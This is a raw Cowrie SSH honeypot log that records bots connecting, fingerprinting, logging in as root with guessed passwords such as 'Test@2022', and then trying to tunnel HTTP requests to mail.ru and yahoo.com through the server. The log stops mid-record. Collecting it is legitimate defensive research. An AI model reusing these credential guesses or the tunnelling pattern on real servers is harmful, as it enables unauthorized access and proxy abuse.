{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:05.194142Z","src_ip":"77.83.207.83","session":"7efbced88071"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:05.445100Z","src_ip":"77.83.207.83","session":"7efbced88071"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":1490,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:1490","sensor":"my-vps","timestamp":"2025-08-31T03:45:05.496293Z","session":"7efbced88071"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:05.546888Z","src_ip":"77.83.207.83","session":"7efbced88071"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":25815,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:25815","sensor":"my-vps","timestamp":"2025-08-31T03:45:05.688728Z","session":"7efbced88071"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:05.738975Z","src_ip":"77.83.207.83","session":"7efbced88071"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":14228,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:14228","sensor":"my-vps","timestamp":"2025-08-31T03:45:05.880611Z","session":"7efbced88071"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:05.930840Z","src_ip":"77.83.207.83","session":"7efbced88071"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:05.982848Z","src_ip":"77.83.207.83","session":"7efbced88071"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":46613,"dst_ip":"1.2.3.4","dst_port":22,"session":"5036389606e6","protocol":"ssh","message":"New connection: 77.83.207.83:46613 (1.2.3.4:22) [session: 5036389606e6]","sensor":"my-vps","timestamp":"2025-08-31T03:45:06.031527Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:06.041601Z","src_ip":"77.83.207.83","session":"5036389606e6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:06.082311Z","src_ip":"77.83.207.83","session":"5036389606e6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:06.331146Z","src_ip":"77.83.207.83","session":"5036389606e6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":1187,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:1187","sensor":"my-vps","timestamp":"2025-08-31T03:45:06.381845Z","session":"5036389606e6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:06.432076Z","src_ip":"77.83.207.83","session":"5036389606e6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":12896,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:12896","sensor":"my-vps","timestamp":"2025-08-31T03:45:06.572198Z","session":"5036389606e6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:06.622164Z","src_ip":"77.83.207.83","session":"5036389606e6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35947,"dst_ip":"1.2.3.4","dst_port":22,"session":"7502611253dd","protocol":"ssh","message":"New connection: 212.227.235.229:35947 (1.2.3.4:22) [session: 7502611253dd]","sensor":"my-vps","timestamp":"2025-08-31T03:45:06.638863Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:06.639574Z","src_ip":"212.227.235.229","session":"7502611253dd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":31916,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:31916","sensor":"my-vps","timestamp":"2025-08-31T03:45:06.764495Z","session":"5036389606e6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:06.814521Z","src_ip":"77.83.207.83","session":"5036389606e6"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:06.865148Z","src_ip":"77.83.207.83","session":"5036389606e6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:45:06.899578Z","src_ip":"212.227.235.229","session":"7502611253dd"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":46707,"dst_ip":"1.2.3.4","dst_port":22,"session":"01d9c0437665","protocol":"ssh","message":"New connection: 77.83.207.83:46707 (1.2.3.4:22) [session: 01d9c0437665]","sensor":"my-vps","timestamp":"2025-08-31T03:45:06.913585Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:06.914499Z","src_ip":"77.83.207.83","session":"01d9c0437665"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:06.964506Z","src_ip":"77.83.207.83","session":"01d9c0437665"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:07.212176Z","src_ip":"77.83.207.83","session":"01d9c0437665"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":21912,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:21912","sensor":"my-vps","timestamp":"2025-08-31T03:45:07.262965Z","session":"01d9c0437665"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:07.312873Z","src_ip":"77.83.207.83","session":"01d9c0437665"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":28813,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:28813","sensor":"my-vps","timestamp":"2025-08-31T03:45:07.456156Z","session":"01d9c0437665"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:07.506006Z","src_ip":"77.83.207.83","session":"01d9c0437665"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":29623,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:29623","sensor":"my-vps","timestamp":"2025-08-31T03:45:07.648343Z","session":"01d9c0437665"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:07.698405Z","src_ip":"77.83.207.83","session":"01d9c0437665"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:07.749048Z","src_ip":"77.83.207.83","session":"01d9c0437665"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":46807,"dst_ip":"1.2.3.4","dst_port":22,"session":"0217f15b9f12","protocol":"ssh","message":"New connection: 77.83.207.83:46807 (1.2.3.4:22) [session: 0217f15b9f12]","sensor":"my-vps","timestamp":"2025-08-31T03:45:07.797800Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:07.807914Z","src_ip":"77.83.207.83","session":"0217f15b9f12"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:07.847658Z","src_ip":"77.83.207.83","session":"0217f15b9f12"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48656,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e043fb059c7","protocol":"ssh","message":"New connection: 212.227.235.229:48656 (1.2.3.4:22) [session: 1e043fb059c7]","sensor":"my-vps","timestamp":"2025-08-31T03:45:07.882963Z"}
{"eventid":"cowrie.login.failed","username":"teamspeak","password":"1","message":"login attempt [teamspeak/1] failed","sensor":"my-vps","timestamp":"2025-08-31T03:45:07.974714Z","src_ip":"212.227.235.229","session":"7502611253dd"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:08.096000Z","src_ip":"77.83.207.83","session":"0217f15b9f12"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":27062,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:27062","sensor":"my-vps","timestamp":"2025-08-31T03:45:08.146884Z","session":"0217f15b9f12"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:08.196849Z","src_ip":"77.83.207.83","session":"0217f15b9f12"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":7652,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:7652","sensor":"my-vps","timestamp":"2025-08-31T03:45:08.340194Z","session":"0217f15b9f12"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:08.390936Z","src_ip":"77.83.207.83","session":"0217f15b9f12"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":8106,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:8106","sensor":"my-vps","timestamp":"2025-08-31T03:45:08.532231Z","session":"0217f15b9f12"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:08.582557Z","src_ip":"77.83.207.83","session":"0217f15b9f12"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:08.633898Z","src_ip":"77.83.207.83","session":"0217f15b9f12"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":46905,"dst_ip":"1.2.3.4","dst_port":22,"session":"072dc526fccb","protocol":"ssh","message":"New connection: 77.83.207.83:46905 (1.2.3.4:22) [session: 072dc526fccb]","sensor":"my-vps","timestamp":"2025-08-31T03:45:08.682934Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:08.683600Z","src_ip":"77.83.207.83","session":"072dc526fccb"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-